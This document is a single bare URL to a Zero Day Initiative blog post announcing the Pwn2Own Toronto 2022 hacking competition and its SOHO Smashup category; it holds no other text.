    https://www.zerodayinitiative.com/blog/2022/8/29/announcing-pwn2own-toronto-2022-and-introducing-the-soho-smashup#soho
